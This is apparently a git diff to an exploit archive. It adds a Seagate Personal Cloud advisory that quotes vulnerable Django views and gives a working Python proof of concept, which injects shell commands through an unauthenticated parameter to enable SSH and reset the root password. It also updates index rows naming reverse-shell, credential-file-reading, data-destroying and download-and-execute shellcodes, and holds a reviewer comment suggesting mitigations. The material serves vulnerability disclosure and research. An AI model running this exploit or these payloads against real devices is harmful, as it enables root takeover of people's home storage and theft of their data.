diff --git a/exploits/hardware/remote/43659.md b/exploits/hardware/remote/43659.md
new file mode 100644
index 000000000..56c3e484e
--- /dev/null
+++ b/exploits/hardware/remote/43659.md
@@ -0,0 +1,134 @@
+# SSD Advisory – Seagate Personal Cloud Multiple Vulnerabilities
+
+## Vulnerabilities summary
+The following advisory describes two (2) unauthenticated command injection vulnerabilities.
+
+Seagate Personal Cloud Home Media Storage is “the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.”
+
+## Credit
+An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
+
+## Vendor response
+Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory
+
+## Vulnerabilities details
+Seagate Media Server uses Django web framework and is mapped to the .psp extension.
+
+Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol.
+/etc/lighttpd/conf.d/django-host.conf:
+
+
+```
+fastcgi.server += (
+".psp"=>
+ ((
+ "socket" => "/var/run/manage_py-fastcgi.socket",
+ "check-local" => "disable",
+ "stream-post" => "enable",
+ "allow-x-send-file" => "enable",
+ )),
+".psp/"=>
+ ((
+ "socket" => "/var/run/manage_py-fastcgi.socket",
+ "check-local" => "disable",
+ "stream-post" => "enable",
+ "allow-x-send-file" => "enable",
+ ))
+)
+```
+
+
+URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py.
+
+Two views were found to be affected by unauthenticated command injection.
+
+The affected views are:
+
+- uploadTelemetry
+- getLogs
+
+These views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module.
+
+This allows an attacker to inject arbitrary system commands, that will be executed with root privileges.
+
+/usr/lib/django_host/seagate_media_server/views.py:
+
+
+```
+@csrf_exempt
+def uploadTelemetry(request):
+ ts = request.GET.get('TimeStamp','')
+ if (checkDBSQLite()) :
+ response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}'
+ else :
+ if ts == "":
+ response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}'
+ return HttpResponse(response);
+ cmd = "/usr/local/bin/log_telemetry "+str(ts)
+ commands.getoutput(cmd)
+ return HttpResponse('{"stat":"ok"}')
+```
+
+
+/usr/lib/django_host/seagate_media_server/views.py:
+
+
+```
+@csrf_exempt
+def getLogs (request):
+ try:
+ cmd_base='/usr/bin/log-extract-manager.sh'
+ uID = request.GET.get ( 'arch_id', None )
+ time_stamp = request.GET.get ( 'time_stamp', '' )
+
+ if uID:
+ (status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID);
+ if ('In progress' in output) and (uID in output) :
+ return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}')
+ elif (status == 0) :
+ return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) ))
+ else :
+ return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' )
+ else:
+ (status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp);
+ if (status == 0) :
+ return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output))
+
+ return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
+ except :
+ return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
+```
+
+
+Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery.
+
+### Proof of Concept
+The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password.
+
+
+```
+#!/usr/bin/env python
+import os
+import urllib
+
+scheme = 'http'
+host = 'personalcloud.local'
+port = '80'
+path = 'uploadTelemetry.psp'
+querystr = 'TimeStamp=%3b'
+#path = 'getLogs.psp'
+#querystr = 'time_stamp=%3b'
+password = 'Welcome01'
+
+cmds = ['ngc --start sshd 2>&1',
+ 'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}]
+
+for cmd in cmds:
+ print 'Running command', repr(cmd)
+ cmd = urllib.quote_plus(cmd)
+ r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd))
+ print r.read()
+
+print 'Log in with', password
+os.system('ssh -p 2222 root@%s' % host)
+```
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a24c2e4f2..8c16d0079 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
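Review bot: The advisory documents the injection in `uploadTelemetry` and `getLogs` but gives no remediation guidance next to the proof of concept, although the quoted views show the root cause plainly: the `TimeStamp`, `arch_id` and `time_stamp` GET parameters are concatenated into a shell command string passed to `commands.getoutput`/`commands.getstatusoutput`. A short mitigation paragraph after the views would help defenders: invoke the helper scripts through `subprocess` with an argument list (no shell), reject any parameter that does not match a strict pattern for a timestamp or archive id before it reaches the command, require authentication on both `.psp` endpoints, and remove `@csrf_exempt` so Django's CSRF protection applies. The bare `except :` in `getLogs` also collapses every failure into the generic code 852 response, so failed attempts leave no trace in application logs; noting this as a detection gap would be useful. The same pattern affects both quoted views, so one remediation note covers both.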
@@ -5247,7 +5247,7 @@ id,file,description,date,author,type,platform,port
 40515,exploits/android/dos/40515.txt,"Google Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",dos,android,
 40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",dos,osx,
 40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",dos,windows,
-43596,exploits/windows/dos/43596.py,"OBS studio 20.1.3 - Local Buffer Overflow",2018-01-15,ScrR1pTK1dd13,dos,windows,
+43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",2018-01-15,ScrR1pTK1dd13,dos,windows,
 40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
 40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
 40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@@ -15813,6 +15813,7 @@ id,file,description,date,author,type,platform,port
 43588,exploits/windows/remote/43588.py,"SysGauge Server 3.6.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
 43589,exploits/windows/remote/43589.py,"Disk Pulse Enterprise 10.1.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
 43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,
+43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,
 40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple,
 40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,
 40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 6b7d7c7bb..7af041d92 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1,47 +1,47 @@
 id,file,description,date,author,type,platform
 14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
-13241,shellcodes/aix/13241.c,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
+13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
 13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
-13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
-13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
+13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
+13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
 13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
-13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
-13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
+13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve(/bin/sh) Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
+13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
 13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
 13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86
 13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
-13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
-13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
+13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
+13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
 13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
 13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
 13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
-13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
-13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
-13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
-13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
+13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
+13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
+13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
+13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
 13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
 13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
 13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
-13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
+13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
 13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
 13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
-13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
+13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
 13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
 13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86
-13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
-13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86
-13274,shellcodes/freebsd_x86/13274.c,"FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)",2004-09-26,preedator,shellcode,freebsd_x86
+13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
+13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86
+13274,shellcodes/freebsd_x86/13274.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (37 bytes)",2004-09-26,preedator,shellcode,freebsd_x86
 13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,shellcode,freebsd_x86
-13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
-13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
+13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
+13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
 13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
 13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
-13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
-13281,shellcodes/generator/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
+13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
+13281,shellcodes/generator/13281.c,"Linux/x86 - execve() Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
 13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
 13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
-13284,shellcodes/generator/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
+13284,shellcodes/generator/13284.txt,"Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
 13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
 13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
 13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator
@@ -50,27 +50,27 @@ id,file,description,date,author,type,platform
 13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
 13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
 13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
-13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
+13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
 13296,shellcodes/linux_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
 13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
 13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
 13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips
-13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
+13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve(/bin/sh) Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
 13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
 13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
-13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc
+13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc
 13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
 13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
-13307,shellcodes/linux_x86/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
+13307,shellcodes/linux_x86/13307.c,"Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
 13308,shellcodes/linux_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
 13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86
-13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86
-13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
-13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
+13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86
+13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
+13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
 13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86
-13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86
-13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86
+13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() + Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86
+13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow + Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86
 13316,shellcodes/linux_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,shellcode,linux_x86
 13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
 13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
@@ -101,31 +101,31 @@ id,file,description,date,author,type,platform
 13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
 13344,shellcodes/linux_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
 13345,shellcodes/linux_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
-13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
+13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
 13347,shellcodes/linux_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13348,shellcodes/linux_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13349,shellcodes/linux_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13350,shellcodes/linux_x86/13350.c,"Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13351,shellcodes/linux_x86/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13352,shellcodes/linux_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
-13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86
-13354,shellcodes/linux_x86/13354.c,"Linux/x86 - execve /bin/sh Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,linux_x86
+13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86
+13354,shellcodes/linux_x86/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,linux_x86
 13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86
 13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86
 13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
-13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
+13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
 13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
-13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
